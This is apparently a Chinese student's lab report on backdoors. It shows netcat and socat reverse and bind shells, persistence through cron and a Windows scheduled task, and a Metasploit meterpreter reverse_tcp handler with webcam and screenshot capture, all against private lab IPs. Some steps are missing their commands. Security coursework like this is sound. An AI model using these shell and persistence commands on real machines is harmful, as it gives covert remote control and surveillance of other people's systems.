2018-2019-2 20165313 Exp2 后门原理与实践
实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?应用程序设定后门,用户安装后,后门就可以进入。例如课堂上讲到的百度。 (2)例举你知道的后门如何启动起来(win及linux)的方式?win中的后门伴随软件启动 (3)Meterpreter有哪些给你映像深刻的功能?可以获取他人的语音录音和视屏,还可以获取他人操作系统权限。 (4)如何发现自己有系统有没有被安装后门?杀毒软件查杀。 试验过程课堂上试验:实践过程:(1)查看win7和kali的ip: (2)进入ncat.exe目录下运行 ncat.exe -l -p 5313 (3)反向链接: nc 192.168.43.65313 -e /bin/sh (4)kali输入 nc -l -p 5313 (5)Windows反弹连接Linux:``` ncat.exe -e cmd.exe 192.168.43.56 5313 任务一:使用netcat获取主机操作Shell,cron启动实践过程:(1)Windows输入指令 (输入保存完成后,可以通过 crontab -l 来查看)
(3)时间到了,就可以运行Linux shell指令: 任务二:使用socat获取主机操作Shell,任务计划启动实践过程:(1)打开Windows->控制面板->系统和安全->管理工具->任务计划程序: (2)新建任务计划,填写任务名称 (3)新建触发器,设置为工作站锁定时,并启用: (4)新建操作,在程序或脚本中选择所下载的socat.exe文件路径,在添加参数中添加tcp-listen:5313 exec:cmd.exe,pty,stderr命令 (5)运行创建任务,在linux中输入指令 socat - tcp:192.168.1.185:5313 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell实践过程:(1)在Linux主机输入指令 (2)在cmd中输入指令 ncat.exe -l 5313 > 5313_backdoor.exe 回车准备接收文件:(3)在kali中输入指令 nc 192.168.43.6 5313 < 20165313_backdoor.exe 发送文件:(4)输入 msfconsole 启动(5)依次输入 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.43.56 set LPORT 5313 输入 show options 查看:任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权实践过程:(1)Linux输入指令 (4) webcam_list 查看目标主机是否有摄像头(5)输入指令 screenshot 截取屏幕(6)输入指令 (7)输入指令 实验总结与体会通过后门进行的攻击更加隐蔽,也更加难以防御,所以只有真正了解其原理,才能找出对应的防御方法。 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- windows7+docker搭建nginx和php-fpm环境(官方镜像)
- 删除Windows10资源管理器多余的入口
- windows – 具有多个根的IIS
- windows-server-2008-r2 – 我无法在Windows Server 2008 R
- wcf – 用于声明模式xRM(Microsoft Dynamics CRM 2011)的Ap
- Skype for Business Server 2019公开预览版发布
- win10完美去除小箭头
- 在Windows中休眠一个进程
- 在Windows x64上使用Visual Studio 2008安装python模块
- winapi – 什么是WIN32 API WM_REFLECT消息?